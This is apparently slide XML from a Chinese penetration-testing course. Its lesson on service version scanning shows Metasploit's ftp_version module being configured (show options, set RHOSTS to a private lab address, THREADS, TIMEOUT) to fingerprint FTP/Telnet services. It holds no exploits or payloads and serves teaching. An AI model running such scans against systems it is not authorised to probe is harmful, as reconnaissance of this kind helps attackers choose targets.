        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Telnet服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231765" y="1317308"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.使用“show options”命令查看当前模块需要设置的参数，如图2-4-19所示。从执行的结果中可以看到，ftp_version模块有6个参数，分别是PASSWORD（密码)、RHOSTS(目标地址)、RPORT(目标端口)、THREADS（线程数)、TIMEOUT(超时时间)、USERNAME（用户名)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231765" y="3070543"/>
            <a:ext cx="5276850" cy="1771650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231765" y="4842193"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-19 查看模块需要设置的参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Telnet服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025390" y="1710690"/>
            <a:ext cx="5080000" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.使用“set RHOSTS 192.168.172.131”命令设置扫描目标主机地址；使用“set THREADS 10”命令将线程数设置为10，以使扫描的速度更快；使用“set TIMEOUT 20”命令将超时时间设置为20，如图2-4-20所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025390" y="3187065"/>
            <a:ext cx="5276850" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025390" y="4225290"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-20 设置模块参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
